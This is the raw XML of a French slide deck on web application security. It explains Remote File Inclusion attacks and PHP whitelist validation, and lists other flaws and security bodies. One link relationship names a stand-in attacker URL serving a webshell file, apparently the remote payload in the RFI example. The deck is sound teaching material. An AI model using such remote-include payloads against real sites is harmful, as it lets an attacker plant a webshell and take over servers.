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Notes de présentation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b796eefd26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b796eefd2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e98a00f4e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e98a00f4e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e98a00f4ed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e98a00f4ed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e98a00f4e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e98a00f4e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e98a00f4e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e98a00f4e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e98a00f4ed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e98a00f4ed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b796eefd2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b796eefd2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b796eefd2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b796eefd2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b796eefd26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b796eefd2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e98a00f4e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e98a00f4e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e98a00f4ed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e98a00f4ed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platform.sh/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://main-bvxea6i-jhmymvgdrjrqo.fr-3.platformsh.site/en/admin/post/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cyber.gouv.fr/"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cnil.fr/"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owasp.or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cert.ssi.gouv.fr/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/"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evil.example.com/webshell.txt" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.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Sécurité des applications Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="25717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Robert Carver - La Grande Classe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385200" y="3663675"/>
            <a:ext cx="40509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i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jeudi 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>octobre 2024</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="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Exemples de protections contre une attaque RFI</a:t>
            </a:r>
            <a:endParaRPr/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Comment sécuriser le code du serveur PHP ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-376237" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Valider avant d'utiliser !</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// si </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="19177C"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'language'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>] ne contient que [a-z] alors ok</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// sinon on ne fait rien</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-376237" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Validation plus robuste : le whitelisting</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="19177C"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ($_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'language'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>] == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'english' || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="19177C"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'language'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>] == </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'french') {</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F9FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	// ok</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F9FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>} else {</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F9FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	// do nothing</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F9FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="139700" marR="139700" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F8F9FA"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="BA2121"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F8F9FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3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Autres failles de sécurité d'application Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="14572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200"/>
              <a:t>En plus de CSRF, XSS, RFI, Injection SQL :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2600"/>
            </a:br>
            <a:endParaRPr sz="2600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-412750" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Injection HTML</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t>Dépassement de tampon (Buffer Overflow)</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>Arnaque au président</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(une forme de spam)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>…</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 attention, danger !</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;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32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="40740"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>Une application Web se trouve dans un des environnements les plus dangereux qui soient. Autant on est heureux de pouvoir produire quelque chose qui est accessible partout dans le monde, autant cela implique des dangers inimaginables. Il y a toutes sortes d’acteurs dangereux. Il y a des pays connus pour être dangereux, comme la Russie et la Chine, où l’application de la loi est différente de la nôtre et qui peuvent être considérés comme des ennemis. Mais il y a aussi un danger dans l’immense variété de personnes qui peuvent se connecter sur Internet, où qu’ils soient, qui peuvent cacher d’où ils viennent, et qui peuvent avoir des niveaux de connaissances qui nous dépassent largement. Quand on utilise un appareil qui se connecte à Internet, on ne se doute sans doute pas de tous les efforts énormes qui ont été faits pour protéger notre appareil, et on ne se doute pas de tous les efforts colossaux par des millions de personnes et de robots pour accéder à nos appareils et en faire des choses auxquelles nous ne consentons pas.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="40740"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>Alors comment se protéger ? Il faut avoir beaucoup d’humilité et trouver de l’aide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>où</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t> l’on peut. La cybersécurité, c’est une profession qu’en tant que développeur de site Web, nous ne maîtrisons pas. Alors pour se protéger, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>où </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>trouver de l’aide ? Une solution, c’est de demander un audit à des gens spécialisés dans la cybersécurité. Ils vont essayer de pénétrer notre système, souvent à l’aide d’outils automatiques. Ce sont des professionnels de type white hat hacker ou chapeau blanc. </a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700"/>
              <a:t>Une autre solution, c’est utiliser des services qui emploient déjà des professionnels de la sécurité. On peut faire appel à des grandes sociétés comme Amazon, Google, ou Microsoft, ou en France OVH ou la société allemande là. Et l’on peut choisir de ne pas faire tout soi-même, d'utiliser un service qui résout beaucoup des soucis auxquels on sera confronté si l’on essaye de tout faire soi-même. Il y a une vaste gamme entre mettre sa machine en ligne et avoir le serveur Web sur sa propre machine et utiliser un service qui se charge de beaucoup de détails. Et qui rajoute plein de protections dont on n'a pas à se soucier.</a:t>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2700"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="5161">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exemple de PaaS Symfony : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="5161">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>platform.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://platform.sh/</a:t>
            </a:r>
            <a:endParaRPr sz="5161">
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3946" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://main-bvxea6i-jhmymvgdrjrqo.fr-3.platformsh.site/en/admin/post/1</a:t>
            </a:r>
            <a:endParaRPr sz="5546"/>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Je présente les points suivants sur la sécurité des applications Web :</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>Quelques noms de la sécurité Web</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>Un cas d’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>attaque d’application Web : le RFI</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>Autres f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>ailles de sécurité d'application Web</a:t>
            </a:r>
            <a:endParaRPr sz="3400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>Conclusions sur un environnement </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="3400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t>Internet dangereux</a:t>
            </a:r>
            <a:endParaRPr sz="3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Quelques noms de la sécurité Web</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 signifient ces abréviations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-449506" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3479"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>ANSSI</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-449506" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3479"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>CNIL</a:t>
            </a:r>
            <a:endParaRPr sz="3478"/>
          </a:p>
          <a:p>
            <a:pPr indent="-449506" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3479"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3478"/>
              <a:t>OWASP</a:t>
            </a:r>
